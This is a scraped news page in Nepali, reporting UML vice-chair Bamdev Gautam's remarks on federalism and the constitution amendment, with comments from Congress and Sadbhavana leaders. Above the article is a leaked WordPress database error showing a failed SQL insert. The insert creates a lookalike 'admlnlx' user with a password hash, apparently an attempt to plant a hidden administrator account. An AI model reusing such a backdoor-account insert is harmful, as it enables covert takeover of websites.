WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEe.16xQbVtpBq5cLIXbGfWnviMRQr.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 11:28:06', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ६ –
प्रमुख प्रतिपक्षी दल नेकपा एमालेका उपाध्यक्ष बामदेव गौतमले आफ्नो पार्टीले अन्जानमै संघियता स्विकारेको बताएका छन् ।
राजधानीमा आयोजित एक अन्तरक्रिया कार्यक्रममा बोल्दै नेता गौतमले तत्कालिन एनेकपा माओवादीले चलाएको हिंसात्मक आन्दोलनलाई शान्तिप्रक्रियामा बदल्नका लागि आफुहरुले बाध्यतामा संघियता स्विकार्नु परेको बताए ।
एमाले उपाध्यक्ष गौतमले तत्कालिन माओवादीले जनताको हत्या गर्न थालेपछि संघीयता स्विकार्नु परेको तर्क गरे ।उनले सरकारले ल्याएको संविधान संशोधनको प्रस्ताव संविधानको समेत उल्लंघन हुनेगरि र जनताको भावना विपरित हुने गरि आएको भन्दै कुनै पनि हालतमा मान्न नसकिने जिकिर गरे ।
यस्तै नेपाली काँग्रेसका नेता प्रकाशमान सिंहले संविधान कार्यान्वयन गर्न सबै दलहरुलाई बाध्यता रहेको बताए । उनले संविधानको नयाँ प्रावधानलाई कार्यान्वयनमा लैजान सबै दलहरु एक हुनुको विकल्प नरहेको समेत बताए ।कार्यक्रममा बोल्दै सदभावना पार्टीका सहअध्यक्ष लक्ष्मण लाल कर्णले मधेशका जनताले नागरिकता पाउन समेत कठिन हुने अवस्था आएको बताए ।